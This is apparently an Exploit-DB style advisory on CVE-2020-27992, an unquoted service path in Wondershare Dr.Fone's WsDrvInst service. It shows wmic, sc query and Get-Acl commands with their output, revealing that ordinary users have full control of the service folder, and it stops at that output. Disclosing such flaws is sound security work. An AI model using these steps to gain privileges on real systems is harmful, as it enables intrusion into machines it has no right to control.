# Exploit Title: Wondershare Dr.Fone DriverInstall.exe - "WsDrvInst" Unquoted Service Path # Date: 2020-10-29 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.wondershare.com # Software Link: https://drfone.wondershare.com/ # Version: 3.0.0 # Tested on: Microsoft Windows 7sp2 x86/x64 # CVE : CVE-2020-27992 - C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Wondershare Driver Install Service WsDrvInst C:\Program Files (x86)\Wondershare\dr.fone\Library\DriverInstaller\DriverInstall.exe Auto - C:\>sc query WsDrvInst NOME_SERVIZIO: WsDrvInst TIPO : 10 WIN32_OWN_PROCESS STATO : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) CODICE_USCITA_WIN32 : 0 (0x0) CODICE_USCITA_SERVIZIO : 0 (0x0) PUNTO_CONTROLLO : 0x0 INDICAZIONE_ATTESA : 0x0 - Get-Acl -Path "C:\Program Files (x86)\Wondershare\dr.fone\Library\DriverInstaller" Directory: C:\Program Files (x86)\Wondershare\dr.fone\Library Path Owner Access ---- ----- ------ DriverInstaller BUILTIN\Administrators BUILTIN\Users Allow FullControl...